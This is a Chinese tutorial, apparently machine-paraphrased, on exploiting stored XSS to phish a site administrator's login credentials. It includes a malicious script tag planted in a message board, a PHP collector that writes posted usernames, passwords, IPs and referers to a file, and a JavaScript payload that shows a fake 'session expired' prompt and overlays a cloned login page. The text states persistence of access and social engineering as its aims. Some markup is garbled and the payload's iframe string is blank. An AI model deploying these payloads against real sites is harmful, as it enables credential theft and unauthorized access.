【超详尽基础教程】根据xss获得管理人员密文账号登陆密码
0x00 序言
文中所说的知识要点很早已有,仅仅由于近期小伙伴们探讨的比较多,并且许多小伙伴们不太确立步骤,故拥有此篇,巨头请忽视
xss大伙儿也不生疏,最常见的便是打管理人员的cookie随后取得后台管理管理权限。
可是在实战演练全过程中会遇到许多要素造成 没法得到 管理权限或是管理权限保持艰难,下边例举了三点。
伴随着开发人员安全防范意识的提升 ,如今大部分全是开过httponly了,换句话说xss没法载入到cookie了(除开包括登陆信息内容外的cookie一般還是能够获得的),它是其一。
cookie具备及时性,例如获得到的cookie到期了,而管理人员又沒有开展第二次登陆并开启的状况下,你的管理权限就没了,它是其二。
xss漏洞已恢复,而且以前的编码已被删掉或是没法开启(例如xss在一个留言板留言处,当后边有很多留言板留言时,你的编码很有可能就到下一页来到,管理人员也一般不容易去翻,也就不容易开启),它是其三
因此 这篇文章内容就来详细介绍根据xss来获得管理人员的账号登陆密码,完成管理权限的保持,并且获得了账号登陆密码,主要用途也有许多,例如社会工作者。
0x01 步骤
电脑打字叙述不太形象化,立即上一个流程表
0x02 准备工作
依据流程表中所展现,大家必须一个垂钓网页页面(精仿原登陆页面)和一个数据信息接受文档。为了更好地简洁明了的演试,这儿提前准备了下列文档:admin_login.html //原管理方法登陆页面admin_index.html //原后台管理系统网页页面fish.html //大家精仿的登陆页面,也就是垂钓页get.php //数据信息接受文档xss.js //xss的payload
编码量不大,我在这立即贴上去//admin_login.html 原管理方法登陆页面登录名:登陆密码:
//admin_index.html 原后台管理系统网页页面<body><head><title>管理人员后台管理title>head><h1>这儿是管理人员后台管理,你已取得成功登陆h1><button type="button">一键日通讯卫星button><hr><b>全新留言板留言b><ul><li>说书人看起来超帅li><li>楼顶说的没错<script src= "http://127.0.0.1/xss.js">script>li>ul>body>html>
//fish.html 大家仿的登陆页面,也就是垂钓页<head><title>管理员登录title>head>登录名:登陆密码:
//get.php 数据信息接受文档$line = '----------------------------------'."\r\n";$user = '账号:'.$_POST['username']."\r\n";$pwd = '登陆密码:'.$_POST['password']."\r\n";$ip = 'IP:'.getenv('REMOTE_ADDR')."\r\n";$url = '垂钓模版:'.getenv('HTTP_REFERER')."\r\n";$date ='日期:'. date("Y-m-d")."\r\n";$result = $line.$url.$user.$pwd.$ip.$date;file_put_contents('good.txt',$result, FILE_APPEND);header("Location: http://127.0.0.1/admin_index.html");?>
//xss.js xss的payloadsetTimeout(function() { alert("登录到期,请再次登录!"); parent.document.writeln(""); setTimeout(function() { document.getElementsByTagName("body")[0].setAttribute("style", "margin: 2px;"); }, 100); setTimeout(function() { parent.document.getElementsByTagName("body")[0].setAttribute("style", "margin: 1080x;"); }, 100);},600000);
0x03 当地演试
最先管理员登录后台管理后,xss开启了,弹出窗口提醒登陆到期,必须再次登陆#p#分页标题#e#
随后出去的是iframe的垂钓网页页面,留意详细地址沒有自动跳转到大家的垂钓网页页面url